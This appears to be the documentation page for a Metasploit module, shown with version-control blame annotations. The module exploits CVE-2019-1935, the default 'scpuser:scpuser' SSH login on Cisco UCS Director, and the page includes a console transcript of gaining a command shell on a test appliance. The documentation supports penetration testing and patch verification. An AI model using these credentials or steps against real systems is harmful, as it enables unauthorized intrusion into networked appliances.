2020-01-20 21:26:59 -05:00
|
|
|
## Vulnerable Application
|
2019-08-29 22:58:24 +07:00
|
|
|
|
|
|
|
|
This module abuses a known default password on Cisco UCS Director. The 'scpuser'
|
|
|
|
|
has the password of 'scpuser', and allows an attacker to login to the virtual appliance
|
|
|
|
|
via SSH (aka CVE-2019-1935).
|
|
|
|
|
|
|
|
|
|
This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.
|
|
|
|
|
Note that Cisco also mentions in their advisory that their IMC Supervisor and
|
|
|
|
|
UCS Director Express are also affected by these vulnerabilities, but this module
|
|
|
|
|
was not tested with those products.
|
|
|
|
|
|
2020-01-20 21:26:59 -05:00
|
|
|
## Scenarios
|
2019-08-29 22:58:24 +07:00
|
|
|
|
|
|
|
|
Setup RHOST and run it!
|
|
|
|
|
|
|
|
|
|
```
|
2025-07-17 11:51:29 +01:00
|
|
|
msf exploit(linux/http/cisco_ucs_rce) > use exploit/linux/ssh/cisco_ucs_scpuser
|
|
|
|
|
msf exploit(linux/ssh/cisco_ucs_scpuser) > set rhost 10.9.8.121
|
2019-08-29 22:58:24 +07:00
|
|
|
rhost => 10.9.8.121
|
2025-07-17 11:51:29 +01:00
|
|
|
msf exploit(linux/ssh/cisco_ucs_scpuser) > set lhost 10.9.8.1
|
2019-08-29 22:58:24 +07:00
|
|
|
lhost => 10.9.8.1
|
2025-07-17 11:51:29 +01:00
|
|
|
msf exploit(linux/ssh/cisco_ucs_scpuser) > run
|
2019-08-29 22:58:24 +07:00
|
|
|
|
|
|
|
|
[*] 10.9.8.121:22 - Attempt to login to the Cisco appliance...
|
|
|
|
|
[+] 10.9.8.121:22 - Login Successful (scpuser:scpuser)
|
|
|
|
|
|
|
|
|
|
[*] Found shell.
|
|
|
|
|
[*] Command shell session 1 opened (10.9.8.1:38113 -> 10.9.8.121:22) at 2019-08-29 22:27:42 +0700
|
|
|
|
|
|
|
|
|
|
whoami
|
|
|
|
|
scpuser
|
|
|
|
|
^C
|
|
|
|
|
Abort session 1? [y/N] y
|
|
|
|
|
""
|
|
|
|
|
|
|
|
|
|
[*] 10.9.8.121 - Command shell session 1 closed. Reason: User exit
|
|
|
|
|
```
|